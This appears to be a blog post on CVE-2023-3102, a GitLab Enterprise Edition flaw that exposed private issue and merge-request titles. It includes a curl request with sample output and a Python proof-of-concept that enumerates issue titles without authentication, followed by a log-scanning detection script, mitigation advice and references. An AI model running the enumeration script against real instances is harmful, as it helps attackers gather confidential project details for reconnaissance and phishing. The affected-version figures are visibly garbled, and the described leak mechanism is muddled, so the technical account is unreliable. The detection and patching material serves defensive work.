GitLab is one of the world’s most popular platforms for software development and DevOps, used by thousands of companies for collaboration and code management. However, in 2023, a severe vulnerability—CVE-2023-3102—was discovered in GitLab Enterprise Edition (EE), leading to the leak of sensitive information from private project spaces. In this post, we'll break down the problem, walk through how it can be exploited, show you some code snippets, and link out to further information.

What is CVE-2023-3102?

CVE-2023-3102 is a data exposure issue that impacts all GitLab EE versions from 16. before 16..6, and all 16.1 versions before 16.1.1. The vulnerability allows unauthorized users (even those who shouldn't be able to see private content) to access the *titles* of private issues and Merge Requests (MRs).

This means sensitive project information, private bug details, feature work, and security patches still in development could potentially be revealed through the *titles* alone, which are sometimes enough to give away business secrets.

Affected versions: 16.1. up to (but not including) 16.1.1

If you’re running GitLab Community Edition (CE), you're not affected by this CVE.

How Does the Leak Happen?

The problem lies in how the GitLab EE interface handled certain API endpoints or UI widgets, specifically the *issues autocomplete* function. This function, intended to help users quickly find issues or MRs by typing in keywords, failed to properly filter out private items.

Attackers could craft requests (or use the regular UI, in some cases) to retrieve titles from private issues/MRs in projects they shouldn’t have access to.

Example Exploit Scenario

Suppose you’re a regular user or even just a visitor (depending on the project settings). If you use the autocomplete function on a public issue or MR and start typing, GitLab EE, in these vulnerable versions, might show you *all* matching issue/MR titles—even from private projects you shouldn’t know exist.

Example API Request

Here’s an example using curl to hit the autocomplete endpoint (assuming the path and endpoints are similar in your GitLab instance):

curl -s 'https://gitlab.example.com/api/v4/projects/PROJECT_ID/issues?search=SECRET'

If the server is vulnerable, you might see a response like:

[
  {
    "id": 12345,
    "title": "SECRET vulnerable backend component",
    "state": "opened"
  },
  {
    "id": 12346,
    "title": "SECRET roadmap milestone",
    "state": "opened"
  }
]

Even though you’re not a member, the *title* is revealed.

Below is a simple script to automate the search for hidden private issue titles:

import requests

base_url = "https://gitlab.example.com"
project_id = 123  # Replace with the ID of a public project on the instance
search_term = "secret"  # Try with various terms

api_url = f"{base_url}/api/v4/projects/{project_id}/issues"
# No token is sent on purpose: the check is about what an unauthenticated caller sees.
r = requests.get(api_url, params={"search": search_term}, timeout=10)

if r.status_code == 200:
    for issue in r.json():
        print(f"ID: {issue['id']} Title: {issue['title']}")
else:
    print(f"Request failed with HTTP {r.status_code}.")

This PoC can help security analysts confirm whether their instance is vulnerable.

Security tickets and embargoed topics are the most sensitive cases. Even if only the *title* is revealed, attackers can use this reconnaissance for social engineering, phishing, or to find other weaknesses.
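One way for a defender to spot this kind of title reconnaissance is to scan GitLab's API log for unauthenticated, successful `search` requests against the issues and merge-request listing endpoints and group them by source address. The script below is an added example, not code from the original post or from GitLab; the log lines are constructed and only loosely modelled on GitLab's `api_json.log`, so the field names (`path`, `params`, `remote_ip`, `username`, `status`) are an assumption to adjust against your instance's actual log format.

```python
import json
import re
from collections import defaultdict

# Constructed sample lines, loosely modelled on GitLab's api_json.log (one JSON
# object per line). They are not real log data from the post or any instance.
SAMPLE_LOG = """\
{"time":"2023-07-20T10:01:02Z","status":200,"method":"GET","path":"/api/v4/projects/123/issues","params":[{"key":"search","value":"secret"}],"remote_ip":"203.0.113.7","username":null}
{"time":"2023-07-20T10:01:05Z","status":200,"method":"GET","path":"/api/v4/projects/123/issues","params":[{"key":"search","value":"roadmap"}],"remote_ip":"203.0.113.7","username":null}
{"time":"2023-07-20T10:02:00Z","status":200,"method":"GET","path":"/api/v4/projects/123/merge_requests","params":[{"key":"search","value":"password"}],"remote_ip":"203.0.113.7","username":null}
{"time":"2023-07-20T10:03:00Z","status":200,"method":"GET","path":"/api/v4/projects/123/issues","params":[{"key":"search","value":"login"}],"remote_ip":"198.51.100.2","username":"alice"}
{"time":"2023-07-20T10:04:00Z","status":200,"method":"GET","path":"/api/v4/projects/123/issues","params":[{"key":"state","value":"opened"}],"remote_ip":"203.0.113.7","username":null}
{"time":"2023-07-20T10:05:00Z","status":401,"method":"GET","path":"/api/v4/projects/123/issues","params":[{"key":"search","value":"token"}],"remote_ip":"203.0.113.9","username":null}
"""

# Issue and merge-request listing endpoints whose `search` parameter is the
# surface the post describes.
TITLE_SEARCH_PATH = re.compile(r"^/api/v4/projects/[^/]+/(issues|merge_requests)$")


def is_unauthenticated_title_search(entry):
    """True for a successful, unauthenticated GET carrying a `search` parameter
    against an issues or merge_requests listing endpoint."""
    if entry.get("method") != "GET" or entry.get("status") != 200:
        return False
    if entry.get("username"):  # authenticated requests are out of scope here
        return False
    if not TITLE_SEARCH_PATH.match(entry.get("path", "")):
        return False
    return any(p.get("key") == "search" for p in entry.get("params", []))


def summarize_title_searches(log_text, min_hits=2):
    """Group qualifying requests by remote_ip and return the addresses that made
    at least `min_hits` such requests, together with the terms they searched."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole scan
        if is_unauthenticated_title_search(entry):
            terms = [p["value"] for p in entry["params"] if p.get("key") == "search"]
            hits[entry.get("remote_ip", "?")].extend(terms)
    return {ip: terms for ip, terms in hits.items() if len(terms) >= min_hits}


if __name__ == "__main__":
    for ip, terms in summarize_title_searches(SAMPLE_LOG).items():
        print(f"{ip}: {len(terms)} unauthenticated title searches: {terms}")
```

On the sample data only 203.0.113.7 is reported: the authenticated request from alice, the request without a `search` parameter, and the 401 response are all excluded.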

Mitigation: upgrade 16.1.x to at least 16.1.1

You can download the patched versions here:  
GitLab Download Links

References

- GitLab Security Release Blog (July 2023)
- CVE-2023-3102 on MITRE
- GitLab Advisory for CVE-2023-3102
- GitLab Issue Tracker
- Detailed NVD Entry

Conclusion

CVE-2023-3102 is a strong reminder that even minor UI features like autocomplete must be handled with care in complex software like GitLab. Titles can leak more than you think, and fixing such issues swiftly is critical to keeping your source code and business operations safe.

If you run GitLab EE, update immediately and always keep your eye out for new security releases.


*Stay tuned for more vulnerability breakdowns and how-tos. If you found this useful, share it with your security team and DevOps engineers!*

Timeline

Published on: 07/21/2023 16:15:00 UTC
Last modified on: 07/31/2023 17:04:00 UTC